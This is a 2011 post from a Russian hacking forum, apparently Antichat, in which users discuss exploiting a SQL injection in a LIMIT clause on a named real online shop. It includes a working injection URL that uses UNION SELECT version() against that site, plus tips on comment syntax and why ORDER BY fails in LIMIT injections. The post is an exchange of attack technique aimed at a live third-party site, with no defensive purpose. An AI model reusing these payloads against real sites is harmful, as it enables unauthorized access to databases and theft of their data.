04.06.2011, 15:59
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от XAMEHA
Tigger
, сайт был выложен.
Faaax
, всё там выводиться:
Код:
http://www.shoptop.ru/sitemap.html?lim1=8252,%208254%20union%20select%20version%28%29,2,3+--+
Инъекция в LIMIT.
Товарисч сенсей, в MySQL запросах комментарий не обрамляется с обеих сторон пробелами.
Сообщение от FlaktW
Разъяснить, как вы подобрали количество полей
+orde+by+3 +--+
+group+by+3+--+
не проходят, или это простая подстановка +union+select+1,2,3+--+ в запрос
В SQLi-иньекциях, которые находятся в LIMIT'e, конструкция ORDER BY не допускается к использованию. Таков синтаксис языка.
Сообщение от XAMEHA
Знаю, так немного удобнее для меня.
Ааа, ну ок. Вопросов больше не имею.
|
|
|